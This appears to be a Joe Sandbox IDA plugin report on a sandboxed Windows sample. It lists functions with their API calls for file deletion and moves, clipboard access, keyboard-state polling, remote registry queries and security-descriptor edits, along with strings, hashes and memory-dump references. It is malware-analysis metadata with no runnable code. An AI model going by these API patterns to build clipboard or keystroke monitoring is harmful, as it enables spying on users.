String ID: $H*-$default$winsta0
API String ID: 2063423040-1876929972
Opcode ID: 9d4ca1571cbdd0f5d04b8570a94fa044bc20fa3f83094b1b029a313f361cfaad
Instruction ID: 7798348f095c6140a4252ebca41c1ddf90f35d5d17deb6bc4be7954cd69cde22
Opcode Fuzzy Hash: 9d4ca1571cbdd0f5d04b8570a94fa044bc20fa3f83094b1b029a313f361cfaad
Instruction Fuzzy Hash: 0581B0B182020AAFDF119FA4DC4AAEE7B78FF04305F044229FD15A6560DB318E69DF65

Function 002660DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00266EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00265FA6,?), ref: 00266ED8

Part of subcall function 00266EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00265FA6,?), ref: 00266EF1

Part of subcall function 0026725E: __wsplitpath.LIBCMT ref: 0026727B
Part of subcall function 0026725E: __wsplitpath.LIBCMT ref: 0026728E

Part of subcall function 002672CB: GetFileAttributesW.KERNEL32(?,00266019), ref: 002672CC

_wcscat.LIBCMT ref: 00266149
_wcscat.LIBCMT ref: 00266167
__wsplitpath.LIBCMT ref: 0026618E
FindFirstFileW.KERNEL32(?,?), ref: 002661A4
_wcscpy.LIBCMT ref: 00266209
_wcscat.LIBCMT ref: 0026621C
_wcscat.LIBCMT ref: 0026622F
lstrcmpiW.KERNEL32(?,?), ref: 0026625D
DeleteFileW.KERNEL32(?), ref: 0026626E
MoveFileW.KERNEL32(?,?), ref: 00266289
MoveFileW.KERNEL32(?,?), ref: 00266298
CopyFileW.KERNEL32(?,?,00000000), ref: 002662AD
DeleteFileW.KERNEL32(?), ref: 002662BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 002662E1
FindClose.KERNEL32(00000000), ref: 002662FD
FindClose.KERNEL32(00000000), ref: 0026630B

Strings

p1#v`K$v, xrefs: 002661BA
\*.*, xrefs: 00266138, 00266147, 00266165

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*$p1#v`K$v
API String ID: 1917200108-1732502266
Opcode ID: c0b1f444bc0d6de2d2c9a7738d66c387088af4d5ee41615135f83d0d542693e9
Instruction ID: 79abaebc03d99b58f8e7067f158fa660f8b1064130465bc87e84a9da5788fdd4
Opcode Fuzzy Hash: c0b1f444bc0d6de2d2c9a7738d66c387088af4d5ee41615135f83d0d542693e9
Instruction Fuzzy Hash: DD512072C1811DAACB21EB91DC98DDB77BCAF05300F0501E6E58AE2141DE769B99CFA4

Function 00276B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(002BDC00), ref: 00276B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00276B44
GetClipboardData.USER32(0000000D), ref: 00276B4C
CloseClipboard.USER32 ref: 00276B58
GlobalLock.KERNEL32(00000000), ref: 00276B74
CloseClipboard.USER32 ref: 00276B7E
GlobalUnlock.KERNEL32(00000000), ref: 00276B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00276BA0
GetClipboardData.USER32(00000001), ref: 00276BA8
GlobalLock.KERNEL32(00000000), ref: 00276BB5
GlobalUnlock.KERNEL32(00000000), ref: 00276BE9
CloseClipboard.USER32 ref: 00276CF6

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 3f42b22bd62423ed5332a98260ebf34b72614a56d7cfcfb3cc78bf08044d9f33
Instruction ID: 52b997958996c3c50869d8226ccd5bbea3db9ad4a006014e70d1f2953aec73a4
Opcode Fuzzy Hash: 3f42b22bd62423ed5332a98260ebf34b72614a56d7cfcfb3cc78bf08044d9f33
Instruction Fuzzy Hash: D251A431254602ABD301EF60ED4EF6E77A8AF85B00F00442EF68AE65D1DF70D915CB62

Function 0026F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0026F62B
FindClose.KERNEL32(00000000), ref: 0026F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0026F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0026F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 0026F6E2
__swprintf.LIBCMT ref: 0026F72E
__swprintf.LIBCMT ref: 0026F767
__swprintf.LIBCMT ref: 0026F7BB

Part of subcall function 0024172B: __woutput_l.LIBCMT ref: 00241784

__swprintf.LIBCMT ref: 0026F809
__swprintf.LIBCMT ref: 0026F858
__swprintf.LIBCMT ref: 0026F8A7
__swprintf.LIBCMT ref: 0026F8F6

Strings

%4d, xrefs: 0026F761
%4d%02d%02d%02d%02d%02d, xrefs: 0026F728
%02d, xrefs: 0026F7B0, 0026F7B9, 0026F807, 0026F856, 0026F8A5, 0026F8F4

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: ccd9f86e0a64ee1e33886199c25909507cdde93cdc08a0e6218cda4aed609bb6
Instruction ID: 05df4c19ba4036edf0060ec8f1ec29360f723ff30ece3b96c8e1782e777ecca6
Opcode Fuzzy Hash: ccd9f86e0a64ee1e33886199c25909507cdde93cdc08a0e6218cda4aed609bb6
Instruction Fuzzy Hash: BCA13FB2428354ABC714EF94D885DAFB7ECAF98704F400C2EB595C7152EB30D969CB62

Function 00271B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00271B50
_wcscmp.LIBCMT ref: 00271B65
_wcscmp.LIBCMT ref: 00271B7C
GetFileAttributesW.KERNEL32(?), ref: 00271B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00271BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00271BC0
FindClose.KERNEL32(00000000), ref: 00271BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00271BE7
_wcscmp.LIBCMT ref: 00271C0E
_wcscmp.LIBCMT ref: 00271C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00271C37
SetCurrentDirectoryW.KERNEL32(002D39FC), ref: 00271C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00271C5F
FindClose.KERNEL32(00000000), ref: 00271C6C
FindClose.KERNEL32(00000000), ref: 00271C7C

Strings

*.*, xrefs: 00271BE2

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 7cda86d066ddeb2bfecfcb2e61e859e1488369159dfca1ed513e28bff31e21d5
Instruction ID: ce1c250687a17743e5157f597d7a21cdd2cff2be67b4b7b497ec70ac439e61ff
Opcode Fuzzy Hash: 7cda86d066ddeb2bfecfcb2e61e859e1488369159dfca1ed513e28bff31e21d5
Instruction Fuzzy Hash: 1E31C53151021A6BCF159FF4EC49ADE77AC9F06314F10819BE80AE2090EB70DEB58E64

Function 00271C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00271CAB
_wcscmp.LIBCMT ref: 00271CC0
_wcscmp.LIBCMT ref: 00271CD7

Part of subcall function 00266BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00266BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00271D06
FindClose.KERNEL32(00000000), ref: 00271D11
FindFirstFileW.KERNEL32(*.*,?), ref: 00271D2D
_wcscmp.LIBCMT ref: 00271D54
_wcscmp.LIBCMT ref: 00271D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00271D7D
SetCurrentDirectoryW.KERNEL32(002D39FC), ref: 00271D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00271DA5
FindClose.KERNEL32(00000000), ref: 00271DB2
FindClose.KERNEL32(00000000), ref: 00271DC2

Strings

*.*, xrefs: 00271D28

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 505abb90ae3546ee6cfe4810ff08cd3fed7111feda59181d7a6f1a2362c9a5c4
Instruction ID: 60db4056078f48156924a4870fcdd6e59a2faf147baf8ded5db12d3dfa51e3d8
Opcode Fuzzy Hash: 505abb90ae3546ee6cfe4810ff08cd3fed7111feda59181d7a6f1a2362c9a5c4
Instruction Fuzzy Hash: 7031053251061A6BCF21EFA8EC49ADE77AC9F06320F108556E809E31D0DB70DEB5CE64

Function 00227D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00227DBD

Strings

[:>:]], xrefs: 00227D37
\, xrefs: 0029F95B
\, xrefs: 00227D89
[, xrefs: 00227E14
], xrefs: 00227D9F
\b(?<=\w), xrefs: 0029F877
\b(?=\w), xrefs: 0029F85E
Q\E, xrefs: 002286D6
\, xrefs: 00227E1D
^, xrefs: 00227D96
[:<:]], xrefs: 00227D1D

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: 966dae839fd7d44ea1b2e003ce84c1cc7a4a506b27220bbadecf66ec57adf4e1
Instruction ID: 40e89f5a44fab80acfea9fbdf62d08d077d01f696db83b8192418a66c16f6aaa
Opcode Fuzzy Hash: 966dae839fd7d44ea1b2e003ce84c1cc7a4a506b27220bbadecf66ec57adf4e1
Instruction Fuzzy Hash: DB82E271D2422ADBCF64CF98D8807EDB7B1BF48310F25816AD859AB341E7749DA4CB90

Function 0027091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 002709DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 002709EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002709FB
__wsplitpath.LIBCMT ref: 00270A59
_wcscat.LIBCMT ref: 00270A71
_wcscat.LIBCMT ref: 00270A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00270A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00270AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00270ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00270AFF
_wcscpy.LIBCMT ref: 00270B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00270B4A

Strings

*.*, xrefs: 00270B05

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 38e369cc65eeda0ed362b9dbccdf57f634a13dbac6fdc32aeff900fc13305698
Instruction ID: 333bb65cdc2b5f54d0e7ecbe86a25ca586bc708d9e60da985a09499a6f1ccf3c
Opcode Fuzzy Hash: 38e369cc65eeda0ed362b9dbccdf57f634a13dbac6fdc32aeff900fc13305698
Instruction Fuzzy Hash: 7F6149B2524205EFD710DF60D88599EB3E8BF89314F04891AF989C7252DB31E959CF92

Function 0025A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0025ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0025ABD7
Part of subcall function 0025ABBB: GetLastError.KERNEL32(?,0025A69F,?,?,?), ref: 0025ABE1
Part of subcall function 0025ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0025A69F,?,?,?), ref: 0025ABF0
Part of subcall function 0025ABBB: HeapAlloc.KERNEL32(00000000,?,0025A69F,?,?,?), ref: 0025ABF7
Part of subcall function 0025ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0025AC0E

Part of subcall function 0025AC56: GetProcessHeap.KERNEL32(00000008,0025A6B5,00000000,00000000,?,0025A6B5,?), ref: 0025AC62
Part of subcall function 0025AC56: HeapAlloc.KERNEL32(00000000,?,0025A6B5,?), ref: 0025AC69
Part of subcall function 0025AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0025A6B5,?), ref: 0025AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0025A6D0
_memset.LIBCMT ref: 0025A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0025A704
GetLengthSid.ADVAPI32(?), ref: 0025A715
GetAce.ADVAPI32(?,00000000,?), ref: 0025A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0025A76E
GetLengthSid.ADVAPI32(?), ref: 0025A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0025A79A
HeapAlloc.KERNEL32(00000000), ref: 0025A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0025A7C2
CopySid.ADVAPI32(00000000), ref: 0025A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0025A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0025A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0025A834

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: ae68787b5c53e00ab35d7d1b46aa90d76cfbb086d428154d516f396b4f4ba194
Instruction ID: 3343c9d770dc2a0e63e55448e37c9155b65c247e41e303df878fdb73662f5fa6
Opcode Fuzzy Hash: ae68787b5c53e00ab35d7d1b46aa90d76cfbb086d428154d516f396b4f4ba194
Instruction Fuzzy Hash: A8515C7191020AAFDF00DFA4DC49AEEBBB9FF05305F048229F915A7290DB34DA19CB65

Function 00226F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

NO_START_OPT), xrefs: 002A2CD1
ANYCRLF), xrefs: 002A2E7D
,, xrefs: 00226F77
UCP), xrefs: 002A2C8F
LF), xrefs: 002A2E26
BSR_ANYCRLF), xrefs: 002A2EA0
LIMIT_RECURSION=, xrefs: 002A2D7E
,,, ,, xrefs: 00227096, 0022709C
UTF), xrefs: 002A2C7C
CR), xrefs: 002A2E09
CRLF), xrefs: 002A2E43
NO_AUTO_POSSESS), xrefs: 002A2CB0
LIMIT_MATCH=, xrefs: 002A2CF2
BSR_UNICODE), xrefs: 002A2EBA
UTF16), xrefs: 002A2C56
ANY), xrefs: 002A2E60

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID: ,$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$,,, ,
API String ID: 0-3390925001
Opcode ID: 08c224c9aa059e4fc2de42aca980877299a4e7e3b175a8f8f79e254d1354cc81
Instruction ID: 5189254226edd5510966ade1d47f903760f163dac9555221dbb09289c409786c
Opcode Fuzzy Hash: 08c224c9aa059e4fc2de42aca980877299a4e7e3b175a8f8f79e254d1354cc81
Instruction Fuzzy Hash: BE727171E2422ADBDF24DF98D8407AEB7B5BF05310F14416AE809EB280DB709E95DF90

Function 002663F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00266EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00265FA6,?), ref: 00266ED8

Part of subcall function 002672CB: GetFileAttributesW.KERNEL32(?,00266019), ref: 002672CC

_wcscat.LIBCMT ref: 00266441
__wsplitpath.LIBCMT ref: 0026645F
FindFirstFileW.KERNEL32(?,?), ref: 00266474
_wcscpy.LIBCMT ref: 002664A3
_wcscat.LIBCMT ref: 002664B8
_wcscat.LIBCMT ref: 002664CA
DeleteFileW.KERNEL32(?), ref: 002664DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 002664EB
FindClose.KERNEL32(00000000), ref: 00266506

Strings

p1#v`K$v, xrefs: 002664DA
\*.*, xrefs: 0026643B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*$p1#v`K$v
API String ID: 2643075503-1732502266
Opcode ID: e3926ef74e51dc1429a288dea06be9fe975859c7fb6936be11015af4faee2985
Instruction ID: b17faa39d6f60c5bb180e45b925f8d36c9acaf35827d73668a2f04d1755fd995
Opcode Fuzzy Hash: e3926ef74e51dc1429a288dea06be9fe975859c7fb6936be11015af4faee2985
Instruction Fuzzy Hash: 5031B4B2418384AAC721DFA4C889ADBB7DCAF56310F40092FF6D9C3141EA35D55D8BA7

Function 002831BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00283C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00282BB5,?,?), ref: 00283C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028328E

Part of subcall function 0022936C: __swprintf.LIBCMT ref: 002293AB
Part of subcall function 0022936C: __itow.LIBCMT ref: 002293DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0028332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002833C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00283604
RegCloseKey.ADVAPI32(00000000), ref: 00283611

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: dd1d67047427316c9276b1289f2b350aec61d04be478b475d36676d3d66e428b
Instruction ID: 67a05869e85bbaddcdc2e60ba119f84a1ec133fcb0c281935e1b16c806baec9b
Opcode Fuzzy Hash: dd1d67047427316c9276b1289f2b350aec61d04be478b475d36676d3d66e428b
Instruction Fuzzy Hash: 17E15A75615210AFCB10EF68C895E6ABBE8EF89710F04886DF54ADB2A1DB30ED15CF41

Function 00262B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00262B5F
GetAsyncKeyState.USER32(000000A0), ref: 00262BE0
GetKeyState.USER32(000000A0), ref: 00262BFB
GetAsyncKeyState.USER32(000000A1), ref: 00262C15
GetKeyState.USER32(000000A1), ref: 00262C2A
GetAsyncKeyState.USER32(00000011), ref: 00262C42
GetKeyState.USER32(00000011), ref: 00262C54
GetAsyncKeyState.USER32(00000012), ref: 00262C6C
GetKeyState.USER32(00000012), ref: 00262C7E
GetAsyncKeyState.USER32(0000005B), ref: 00262C96
GetKeyState.USER32(0000005B), ref: 00262CA8

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f9f0d485bf8b8c27b25ccff5c9580fe6c984af6d480f1677ae12090f57976fb7
Instruction ID: 54dfcb8417360d02be366edcd2150a06592321d164b1bea5fd49294504267772
Opcode Fuzzy Hash: f9f0d485bf8b8c27b25ccff5c9580fe6c984af6d480f1677ae12090f57976fb7
Instruction Fuzzy Hash: E741DB34914FCBADFF359F6488043A9BFA0AF12348F44405AD9C6566C1DF9499ECC762

Function 00276D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00276D2E
EmptyClipboard.USER32 ref: 00276D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00276D49
CloseClipboard.USER32 ref: 00276DE8

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 8e425bf387d2f230011e7b1f4b9acba4e35083527a57f9a5fbfb73f418a1d7ef
Instruction ID: 6111e9fea28daf7e173532f40d43ff6b25d43160bdd3216755ddf9fb640d43d6
